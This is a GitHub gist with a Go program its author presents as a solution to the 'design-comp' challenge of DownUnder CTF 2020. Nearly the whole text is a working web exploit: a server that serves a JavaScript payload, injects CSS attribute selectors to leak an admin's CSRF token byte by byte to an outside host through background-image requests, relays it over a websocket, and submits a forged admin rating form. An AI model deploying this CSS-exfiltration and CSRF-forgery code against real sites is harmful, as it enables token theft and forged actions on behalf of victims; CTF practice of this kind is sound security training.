Skip to content

Instantly share code, notes, and snippets.

@adamyi

adamyi/main.go

Created September 20, 2020 10:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save adamyi/2972836d0971cf8c6f86cdaffa814dec to your computer and use it in GitHub Desktop.
Save adamyi/2972836d0971cf8c6f86cdaffa814dec to your computer and use it in GitHub Desktop.
Download ZIP
My solution for design-comp challenge in DownUnder CTF 2020
Raw
main.go
package main
import (
"crypto/tls"
"log"
"net/http"
"github.com/gorilla/websocket"
"golang.org/x/crypto/acme/autocert"
)
var csrf chan string
var upgrader = websocket.Upgrader{
ReadBufferSize: 1024,
WriteBufferSize: 1024,
CheckOrigin: func(r *http.Request) bool { return true },
}
const payload = `
<html><body><script>
const childwin = window.open('https://chal.duc.tf:30105/playground/fcd3c750-067c-4fa6-97ae-d398e4ff4ef6', 'haha', 'height=300px, width=500px');
setTimeout(function() {
const socket = new WebSocket('wss://demo.nsa.group/ws');
socket.addEventListener('message', async function (event) {
const csrf = event.data;
console.log(csrf);
if (csrf.length < 24) {
var msg = "#rater {display: block !important;}";
for (var i = 0; i < 256; i++) {
var ncsrf;
if (i < 16) {
ncsrf = csrf + "0" + i.toString(16);
} else {
ncsrf = csrf + i.toString(16);
}
msg += "\ninput[value^='" + ncsrf + "'] ~ * ~ * ~ * {background: url(https://demo.nsa.group/csrf?c=" + ncsrf + ") !important;}";
}
childwin.postMessage({action:'preview', css: msg}, '*');
} else {
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://chal.duc.tf:30105/admin/rate';
const csrfField = document.createElement('input');
csrfField.type = 'hidden';
csrfField.name = 'csrf';
csrfField.value = csrf;
form.appendChild(csrfField);
const userField = document.createElement('input');
userField.type = 'hidden';
userField.name = 'user';
userField.value = 'fcd3c750-067c-4fa6-97ae-d398e4ff4ef6';
form.appendChild(userField);
const scoreField = document.createElement('input');
scoreField.type = 'hidden';
scoreField.name = 'score';
scoreField.value = '10';
form.appendChild(scoreField);
document.body.appendChild(form);
form.submit();
}
});
}, 200);
</script></body></html>
`
func wsEndpoint(w http.ResponseWriter, r *http.Request) {
ws, err := upgrader.Upgrade(w, r, nil)
if err != nil {
log.Println(err)
return
}
log.Println("Client Connected")
// clean out old data
select {
case <-csrf:
default:
}
c := ""
for {
log.Printf("Sending %s", c)
if err = ws.WriteMessage(1, []byte(c)); err != nil {
log.Println(err)
}
c = <-csrf
}
}
func stealCsrf(w http.ResponseWriter, r *http.Request) {
r.ParseForm()
c := r.URL.Query().Get("c")
log.Printf("Received %s", c)
csrf <- c
}
func hack(w http.ResponseWriter, r *http.Request) {
w.Header().Add("Content-Type", "text/html")
w.Write([]byte(payload))
}
func main() {
csrf = make(chan string, 1)
http.HandleFunc("/", hack)
http.HandleFunc("/ws", wsEndpoint)
http.HandleFunc("/csrf", stealCsrf)
certManager := autocert.Manager{
Prompt: autocert.AcceptTOS,
HostPolicy: autocert.HostWhitelist("demo.nsa.group"),
Cache: autocert.DirCache("./"),
}
server := &http.Server{
Addr: ":https",
TLSConfig: &tls.Config{
GetCertificate: certManager.GetCertificate,
},
}
go func() {
h := certManager.HTTPHandler(nil)
log.Fatal(http.ListenAndServe(":http", h))
}()
log.Fatal(server.ListenAndServeTLS("", ""))
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment